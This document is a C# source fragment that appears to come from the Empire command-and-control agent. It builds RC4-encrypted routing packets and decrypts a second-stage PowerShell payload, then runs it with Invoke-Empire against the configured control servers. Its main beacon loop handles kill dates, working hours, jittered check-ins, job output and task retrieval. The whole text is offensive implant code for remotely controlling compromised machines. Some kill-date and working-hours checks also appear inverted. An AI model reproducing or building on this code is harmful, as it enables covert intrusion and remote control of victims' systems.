//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta) { int encryptedBytesLength = 0; if (encryptedBytes != null && encryptedBytes.Length > 0) { encryptedBytesLength = encryptedBytes.Length; } byte[] data = Encoding.ASCII.GetBytes(sessionInfo.GetAgentID()); byte lang = 0x03; data = Misc.combine(data, new byte[4] { lang, Convert.ToByte(meta), 0x00, 0x00 }); data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength)); byte[] initializationVector = NewInitializationVector(4); byte[] rc4Key = Misc.combine(initializationVector, sessionInfo.GetStagingKeyBytes()); byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data); routingPacketData = Misc.combine(initializationVector, routingPacketData); if (encryptedBytes != null && encryptedBytes.Length > 0) { routingPacketData = Misc.combine(routingPacketData, encryptedBytes); } return(routingPacketData); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private void PowershellEmpire(byte[] stage2Response) { string empire = Encoding.ASCII.GetString(aesDecrypt(sessionInfo.GetSessionKey(), stage2Response)); string execution = "Invoke-Empire"; execution += " -Servers \"" + sessionInfo.GetControlServers().First() + "\""; execution += " -StagingKey \"" + sessionInfo.GetStagingKey() + "\""; execution += " -SessionKey \"" + sessionInfo.GetSessionKey() + "\""; execution += " -SessionID \"" + sessionInfo.GetAgentID() + "\""; #if (PRINT) Console.WriteLine(execution); #endif using (Runspace runspace = RunspaceFactory.CreateRunspace()) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { pipeline.Commands.AddScript(empire + ";" + execution + ";"); pipeline.Invoke(); } } }
//////////////////////////////////////////////////////////////////////////////// // Main Loop //////////////////////////////////////////////////////////////////////////////// private void Run() { //////////////////////////////////////////////////////////////////////////////// if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0 || coms.MissedCheckins > sessionInfo.GetDefaultLostLimit()) { jobTracking.CheckAgentJobs(ref packets, ref coms); if (packets.Length > 0) { coms.SendMessage(packets); } string message = ""; if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0) { message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: past killdate"; } else { message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: Lost limit reached"; } ushort result = 0; coms.SendMessage(coms.EncodePacket(2, message, result)); Environment.Exit(1); } //////////////////////////////////////////////////////////////////////////////// if (null != sessionInfo.GetWorkingHoursStart() && null != sessionInfo.GetWorkingHoursEnd()) { DateTime now = DateTime.Now; if ((sessionInfo.GetWorkingHoursEnd() - sessionInfo.GetWorkingHoursStart()).Hours < 0) { sessionInfo.SetWorkingHoursStart(sessionInfo.GetWorkingHoursStart().AddDays(-1)); } if (now.CompareTo(sessionInfo.GetWorkingHoursStart()) > 0 && now.CompareTo(sessionInfo.GetWorkingHoursEnd()) < 0) { TimeSpan sleep = sessionInfo.GetWorkingHoursStart().Subtract(now); if (sleep.CompareTo(0) < 0) { sleep = (sessionInfo.GetWorkingHoursStart().AddDays(1) - now); } Thread.Sleep((int)sleep.TotalMilliseconds); } } //////////////////////////////////////////////////////////////////////////////// if (0 != sessionInfo.GetDefaultDelay()) { int max = (int)((sessionInfo.GetDefaultJitter() + 1) * sessionInfo.GetDefaultDelay()); if (max > int.MaxValue) { max = int.MaxValue - 1; } int min = (int)((sessionInfo.GetDefaultJitter() - 1) * sessionInfo.GetDefaultDelay()); if (min < 0) { min = 0; } int sleepTime; if (min == max) { sleepTime = min; } else { Random random = new Random(); sleepTime = random.Next(min, max); } Thread.Sleep(sleepTime * 1000); } //////////////////////////////////////////////////////////////////////////////// byte[] jobResults = jobTracking.GetAgentJobsOutput(ref coms); if (0 < jobResults.Length) { coms.SendMessage(jobResults); } //////////////////////////////////////////////////////////////////////////////// byte[] taskData = coms.GetTask(); if (taskData.Length > 0) { coms.MissedCheckins = 0; if (String.Empty != Encoding.UTF8.GetString(taskData)) { coms.DecodeRoutingPacket(taskData, ref jobTracking); } } GC.Collect(); }